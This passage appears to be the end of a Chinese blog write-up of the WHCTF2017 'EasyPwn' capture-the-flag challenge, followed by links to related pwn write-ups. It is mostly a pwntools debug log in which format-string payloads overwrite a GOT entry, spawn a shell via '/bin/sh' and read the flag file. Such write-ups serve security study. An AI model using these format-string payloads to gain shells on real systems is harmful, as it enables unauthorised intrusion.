    00000410  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │    │    │    │    │
    *
    00000490  20 20 20 20  20 20 20 20  20 20 20 20  20 20 0a 49  │    │    │    │  ·I│
    000004a0  6e 70 75 74                                         │nput│
    000004a4
[DEBUG] Received 0xc bytes:
    b' Your Code:\n'
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003e0  61 61 61 61  61 61 61 61  62 62 25 36  39 63 25 31  │aaaa│aaaa│bb%6│9c%1│
    000003f0  33 33 24 68  68 6e 41 41  19 c0 e1 a5  e0 55 00 00  │33$h│hnAA│····│·U··│
    00000400  0a                                                  │·│
    00000401
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x463 bytes:
    00000000  59 6f 75 72  20 49 6e 70  75 74 20 49  73 20 3a 61  │Your│ Inp│ut I│s :a│
    00000010  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003f0  61 61 61 61  61 61 61 62  62 25 36 39  63 25 31 33  │aaaa│aaab│b%69│c%13│
    00000400  33 24 68 68  6e 41 41 19  c0 e1 a5 e0  55 20 20 20  │3$hh│nAA·│····│U   │
    00000410  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │    │    │    │    │
    *
    00000450  20 0a 49 6e  70 75 74 20  59 6f 75 72  20 43 6f 64  │ ·In│put │Your│ Cod│
    00000460  65 3a 0a                                            │e:·│
    00000463
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003e0  61 61 61 61  61 61 61 61  62 62 25 36  36 63 25 31  │aaaa│aaaa│bb%6│6c%1│
    000003f0  33 33 24 68  68 6e 41 41  1a c0 e1 a5  e0 55 00 00  │33$h│hnAA│····│·U··│
    00000400  0a                                                  │·│
    00000401
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x460 bytes:
    00000000  59 6f 75 72  20 49 6e 70  75 74 20 49  73 20 3a 61  │Your│ Inp│ut I│s :a│
    00000010  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003f0  61 61 61 61  61 61 61 62  62 25 36 36  63 25 31 33  │aaaa│aaab│b%66│c%13│
    00000400  33 24 68 68  6e 41 41 1a  c0 e1 a5 e0  55 20 20 20  │3$hh│nAA·│····│U   │
    00000410  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │    │    │    │    │
    *
    00000440  20 20 20 20  20 20 20 20  20 20 20 20  20 20 0a 49  │    │    │    │  ·I│
    00000450  6e 70 75 74  20 59 6f 75  72 20 43 6f  64 65 3a 0a  │nput│ You│r Co│de:·│
    00000460
[DEBUG] Sent 0x2 bytes:
    b'2\n'
[DEBUG] Received 0x11 bytes:
    b'Input Your Name:\n'
[DEBUG] Sent 0x8 bytes:
    b'/bin/sh\n'
[*] Switching to interactive mode

[DEBUG] Received 0x21 bytes:
    b'OK!I Know Your Name :/bin/sh\n'
    b'Now!'
OK!I Know Your Name :/bin/sh
Now!$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x64 bytes:
    b'bin\n'
    b'boot\n'
    b'dev\n'
    b'etc\n'
    b'home\n'
    b'lib\n'
    b'lib32\n'
    b'lib64\n'
    b'media\n'
    b'mnt\n'
    b'opt\n'
    b'proc\n'
    b'root\n'
    b'run\n'
    b'sbin\n'
    b'srv\n'
    b'start.sh\n'
    b'sys\n'
    b'tmp\n'
    b'usr\n'
    b'var\n'
bin
boot
dev
etc
home
lib
lib32
lib64
media
mnt
opt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x5 bytes:
    b'cat: '
cat: [DEBUG] Received 0x20 bytes:
    b'flag: No such file or directory\n'
flag: No such file or directory
$ cd home
[DEBUG] Sent 0x8 bytes:
    b'cd home\n'
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x5 bytes:
    b'xctf\n'
xctf
$ cd xctf
[DEBUG] Sent 0x8 bytes:
    b'cd xctf\n'
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x25 bytes:
    b'bin\n'
    b'dev\n'
    b'easypwn\n'
    b'flag\n'
    b'lib\n'
    b'lib32\n'
    b'lib64\n'
bin
dev
easypwn
flag
lib
lib32
lib64
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x2d bytes:
    b'cyberpeace{************************c97f2888818ecf}\n'
cyberpeace{************************c97f2888818ecf}
aptx4869_li
关注
专栏目录
Linux pwn入门教程(6)——格式化字符串漏洞
xiaoi123的博客
08-03 2276
作者:Tangerine@SAINTSEC 0x00 printf函数中的漏洞 printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用,例如 char s[20] = “Hello world!\n”; printf(“%s”, s); 然而,有时候为了省事也会写成 char s[20] = “Hello wor...
攻防世界-PWN进阶区-EasyPwn(XCTF 4th-WHCTF-2017)
weixin_44145820的博客
03-04 1960
这题其实不算难,不过漏洞比较隐蔽,需要细心才能发现 题目分析 checksec: RELRO只是部分开启,考虑覆写GOT main: echo: 在该函数中存在一个溢出: v2的大小为1000(0x3E8),而我们的输入最大为0x438(输入缓冲区大小为0x400),如果我们的输入大于0x3E8,就会覆盖了v3的内容(%s),而%s是snprintf在向v2写入数据时格式化写入的数据的,如...
fmt格式化字符串漏洞总结
最新发布
2302_79542511的博客
08-18 902
本文章适合写题时帮助快速回忆,不适合初学者。
HNCTF2024-easypwn
sagic的博客
07-18 213
我们可以执行 exec 1>&0,也就是把标准输出重定向到标准输入,因为默认打开一个终端后,0,1,2都指向同一个位置也就是当前终端,所以这条语句相当于重启了标准输出,此时就可以执行命令并且看得到输出了。0是标准输入,1是标准输出,2是标准错误。
攻防世界easypwn
weixin_44447516的博客
08-01 539
攻防世界 EasyPwn
攻防世界PWNEasyPwn题解
seaaseesa的博客
11-15 3851
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 4112
攻防世界-Pwn-new-easypwn
攻防世界格式化字符串漏洞greeting150
Rt1Text的博客
04-10 438
1.checksec+运行 32位/NX堆栈不可执行/Canary保护 注意一点:没有RELRO保护,got完全可写 2.IDA常规操作 1.main函数 2.getnline函数 看到以上信息可以 泄露任意地址的内存 但是........上面的看着感觉不是很多对 原来是这样 出现了aaaa---->0x61616161,参数在格式化字符串第12个位置 aaaaaa%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,...
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
pwn 格式化字符串漏洞
清霂的博客
03-10 517
7.cgpwn2 file checksec ida32
WICCTF-2021-easypwn
05-12
2021津门杯ctf的第一道pwn题。
攻防世界-pwn CGfsb (格式化字符串)
菜的只能随便写写博客
08-05 1589
0x01 拿到题目之后首先分析文件 得到信息: 32bit ELF可执行文件 未开启PIE(即静态反汇编得地址可以直接使用) 0x02 执行文件 执行文件之后发现程序接收两个输入并将其原样输出   0x03 利用IDA反汇编 发现flag,需要将pwnme的值改为8才能拿到flag 通过查找发现pwnme在bss段,并且在程序之中用到了printf,可以考虑用格式化漏洞将...
easypwn
zip471642048的博客
12-01 284
esaypwn
攻防世界 CGfsb-格式化字符串漏洞
Casuall的博客
05-21 715
引用维基百科https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_intro/ 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程...
roarctf_2019_easy_pwn
maple105890的博客
01-07 197
用off by one构造的烦人的堆重叠,真的调试的我想死
2022赣育杯easypwn
qingan6的博客
11-14 214
2022赣育杯easypwn writeup
攻防世界序列化漏洞详解与利用
然而,我们可以通过理解序列化字符串的结构来规避`__wakeup`。序列化的字符串格式为: ``` O:<length>:"<classname>":<n>:{<fieldname1><fieldvalue1><fieldnamen><fieldvaluen>} ``` 这里的`<n>`代对象属性的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值